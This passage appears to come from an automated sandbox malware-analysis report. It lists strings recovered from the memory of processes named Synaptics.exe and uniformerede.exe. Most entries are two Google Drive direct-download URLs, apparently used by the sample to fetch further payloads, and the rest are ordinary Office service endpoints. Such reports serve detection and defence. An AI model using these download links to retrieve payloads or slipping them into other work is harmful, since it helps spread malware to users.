Synaptics.exe, 00000009.00000000.354553381.0000000005F0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.384503032.00000000096DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358342707.000000000818E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371594629.000000000959E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.373669676.00000000076BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408212313.000000000506D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.385722874.000000000A49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408502135.000000000568D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo$
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Y6
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Y#
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI#N
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNZ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNw
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU#Z
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ=
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZw
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadana
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadblY
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbw
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
